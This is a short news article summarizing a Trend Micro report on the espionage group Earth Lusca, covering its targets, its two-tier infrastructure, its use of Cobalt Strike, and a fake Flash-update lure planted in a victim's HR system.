Numerous factors have made attribution more difficult today than it has ever been, especially when it comes to attributing cyberespionage operations to threat actors, said Anti-Virus/Security Company, TrendMicro.
The infrastructure and malware that threat actors use constantly evolve, and the same actor can even use a totally different set of tools, tactics, and procedures (TTPs) from one campaign to another. In addition, several different threat actors might collaborate and share tools, infrastructure, or malware, TrendMicro added.
Since mid-2021, we have been investigating a rather elusive threat actor called ‘Earth Lusca’ that targets organizations globally via a campaign that uses traditional social engineering techniques such as spear phishing and watering holes.
The group’s primary motivation seems to be cyberespionage: the list of its victims includes high value targets such as government and educational institutions, religious movements, pro-democracy and human rights organizations in Hong Kong, Covid-19 research organizations, and the media, among others.
However, the threat actor also seems to be financially motivated, as it also took aim at gambling and cryptocurrency companies.
Previous research into the group’s activities attributed it to other threat actors such as the Winnti group due to the use of malware such as Winnti, but despite some similarities, we consider Earth Lusca a separate threat actor (we do have evidence, however, that the group is part of the “Winnti cluster,” which is comprised of different groups with the same origin country and share aspects of their TTPs).
Earth Lusca’s infrastructure can essentially be grouped into two “clusters.” The first cluster is built using virtual private servers (VPS), rented from a service provider, that are used for the group’s watering hole and spear phishing operations, in addition to acting as a command-and-control (C&C) server for malware.
The second cluster is made up of compromised servers running old, open-source versions of Oracle GlassFish Server. Interestingly, this second cluster performs a different role in an Earth Lusca attack — it acts as a scanning tool that searches for vulnerabilities in public-facing servers and builds traffic tunnels within the target’s network. Like the first cluster, it also serves as a C&C server, this time for Cobalt Strike.
It’s possible that the group used portions of its infrastructure (particularly the scanning aspects) for diversion in order to trick security staff into focusing on the wrong parts of the network.
In one incident, the group injected a malicious script into the compromised HR system of a target organization. This script was designed to show a social engineering message — typically a Flash update popup or a DNS error (note that Adobe discontinued Flash Player at the end of December 2020) that then instructed the visitor to download a malicious file that turned out to be a Cobalt Strike loader.
Read the full report here(PDF File).
- White House Warns of Imminent Russian Invasion of Ukraine
- Voters: Majority says country going in ‘wrong direction’ under Biden
- Biden Regime Creating Database Of People And Their Religious Beliefs
- Parents Enraged at Michigan Democrat Party Over Facebook Post. “They Think They Own Our Kids.”
- REALLY MSNBC? Using A Jew-Hater To Discuss Texas Synagogue Takeover: You Guys Nuts?
Turn your back on Big Tech oligarchs and join the New Resistance NOW! Facebook, Google, and other members of the Silicon Valley Axis of Evil are now doing everything they can to deliberately silence conservative content online, so please be sure to check out our MeWe page here, check us out at ProAmerica Only and follow us at Parler, Social Cross and Gab. You can also follow us on Twitter at @co_firing_line, and at the new social media site set up by members of Team Trump, GETTR.